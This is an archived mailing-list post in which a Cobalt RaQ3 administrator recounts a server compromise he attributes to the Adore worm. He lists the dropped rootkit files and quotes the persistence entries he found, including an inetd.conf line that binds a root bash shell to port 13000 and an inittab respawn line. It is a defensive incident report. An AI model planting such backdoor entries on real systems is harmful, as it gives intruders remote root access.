[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] Adore Worm experience on my Cobalt RaQ3

Summary:

On 5/9/00 we discovered our cobalt webserver had been compromised.  I
suspect that egress was obtained via the ftpd or bind.  I have "mostly"
recovered, and am hardenning the box as much as I can.  This appears to be
the Adore worm.  It deposits a little special binaries that I suspect a bot
used in irc war games, regardless of what it does it executes as root and I
cannot allow that.

Oh brave new world that has such people in it...

------------------------------------------
Details:

It is impossible to say when the computer was compromised, I can only say
that it was discovered on 5/9/01 about 2:30 PM after erratic behavior of the
system prompted the Web-Mistress to look into the box. A shell account from
none of her accounts worked.

We called the collocation facility to reboot the box.   The admin password
did not work, but the other accounts worked.

We had the collocation facility reset the password with the ?paper clip?
method.  We gained access, then started to nose around.

Looking at the box using ps and nstat showed nothing out of the ordinary.
Usage looked ok.  But I noticed that the sshd daemon was not showing.
Looking at the process information in /proc showed  that ssh was running and
squid was running at /usr/man/man8/squid.   I killed the process and it
reappeared.  I gziped it and it stopped.
Looking at the /etc/inittab I found the following:

pa:2345:respawn:/usr/man/man4/squid >> /dev/null

I then moved to the /etc/inetd.conf to discover
13000 stream tcp nowait root /bin/bash /bin/bash -i

Not good!!! And a long session ensued of about 30 hours.

I noticed that tcp-wrappers was not behaving quite right.
So I restored   net-tools, procps and build the latest tcp-wrappers.

And then started to play a game of hunt the wumpus.  I truly helped to have
a box with nmap installed to scan for listeners.

I found the following treasures:

/dev/.recardo
/usr/lib/pt07
/usr/man/man1/pt07
/dev/?
/dev/cui220
/dev/cui/221
/sbin/ipchains-l

So I created a folder called hacked and here are the contents

ls -laR | more
.:
total 171
drwxr-xr-x   4 root     root         1024 May 11 00:58 .
drwxr-x---  12 root     root         1024 May 11 12:33 ..
drwxr-xr-x   2 33       root         1024 Feb 10 07:31 ...
drwxrwxr-x   2 root     root         1024 Feb 10 08:07 .ricardo
-rwxr-xr-x   1 root     root          663 Feb 10 07:55 cui220
-rwxr-xr-x   1 root     root          119 Feb 10 07:54 cui221
-rw-r--r--   1 root     root        20480 May 11 00:58 ipchains-l.tgz
-rwxr-xr-x   1 root     root        57896 Jun 18  1999 netstat
-r-xr-xr-x   1 root     root        60460 Apr  3  1999 ps
-rw-r--r--   1 root     root         9463 May 11 00:51 pt07.tgz
-rwxr-xr-x   1 33       root        14146 Jan 23 16:49 squid

...:
total 251
drwxr-xr-x   2 33       root         1024 Feb 10 07:31 .
drwxr-xr-x   4 root     root         1024 May 11 00:58 ..
-rwxr-xr-x   1 root     root        10495 Jan 17 14:13 .pine.out
-rwxr-xr-x   1 root     root        28856 Sep  3  2000 .synscan
-rwxr-xr-x   1 root     root        14319 Jan 22 16:43 .tty
-rwxr-xr-x   1 root     root        38742 Jan  2 14:11 .vani
-rw-r--r--   1 root     root         5448 Feb 10 07:31 adore.o
-rwxr-xr-x   1 root     root        14156 Feb 10 07:31 ava
-rwxr-xr-x   1 root     root        14017 Sep  3  2000 bnc
-rwxr-xr-x   1 root     root          327 Jan 23 17:54 bnc.conf
-rwxr-xr-x   1 1000     users       26908 Aug 15  2000 gen
-rwxr-xr-x   1 root     root        13136 Jan 18 12:23 nscan
-rwxr-xr-x   1 root     root          130 Jan 18 12:23 nscan.conf
-rwxr-xr-x   1 root     root        15284 Feb 10 07:31 pscan
-rwxr-xr-x   1 1000     users       36463 Aug 15  2000 rpcscan
-rwxr-xr-x   1 1250     users        8369 Sep  3  2000 slice2
-rwxr-xr-x   1 root     root        12208 Jul 30  2000 sup

.ricardo:
total 19
drwxrwxr-x   2 root     root         1024 Feb 10 08:07 .
drwxr-xr-x   4 root     root         1024 May 11 00:58 ..
-rw-rw-r--   1 root     root          414 Feb 10 08:08 a
-rwxrwxr-x   1 root     root        14017 Jan 21 07:59 bnc
-rw-rw-r--   1 root     root          414 Feb 10 08:13 bnc.conf

The following strings identify what the binary that was left on my system

    Welcome GiD
         .
  You are now r00t.
   Ph34r My Sk||n5
 /bin/sh


/dev/cui220 looked like a bread crumb trail

2 pt07
3 pt07
3 .synscan
3 rpcscan
4 rpcscan
3 bnc
4 bnc
5 bnc
3 slice2
4 slice2
5 slice2
6 slice2
3 eggdrop
4 eggdrop
5 eggdrop
6 eggdrop
7 eggdrop
2 sup
3 sup
4 sup
5 sup
6 sup
7 sup
8 sup
3 .vani
2 .pine.out
3 .pine.out
4 .pine.out
5 .pine.out
6 .pine.out
7 .pine.out
8 .pine.out
9 .pine.out
3 ipchains-l
3 ipchains-l
4 ipchains-l
5 ipchains-l
6 ipchains-l
7 ipchains-l
8 ipchains-l
9 ipchains-l
10 ipchains-l
3 nscan
4 nscan
5 nscan
6 nscan
7 nscan
8 nscan
9 nscan
10 nscan
11 nscan
3 squid
3 squid
3 squid
4 squid
5 squid
6 squid
7 squid
8 squid
9 squid
10 squid
11 squid
12 squid
1 sh
2 sh
3 sh
4 sh
5 sh
6 sh
7 sh
8 sh
9 sh
10 sh
11 sh
12 sh
13 sh
3 inetd

And /dev/cui221 looked like configuration data

3 65531
3 8888
3 65534
4 6667
2 200.192
2 200.251
2 200.195
2 200.194
2 200.224
3 39168
3 5690
3 8888
3 65521
3 13000

How we were broken into?don?t know.   I suspect  bind or proftpd, but don?t
know, the logs show me nothing.  There was an inconsistency between lastlog
and wtmp, but I was not smart enough to figure it out.

Did I find all of the treasures...maybe.  I have tightened up my system some
more until I get a chance to do a total reload, and in the mean
time...verify often and hope that this person gets caught!

jack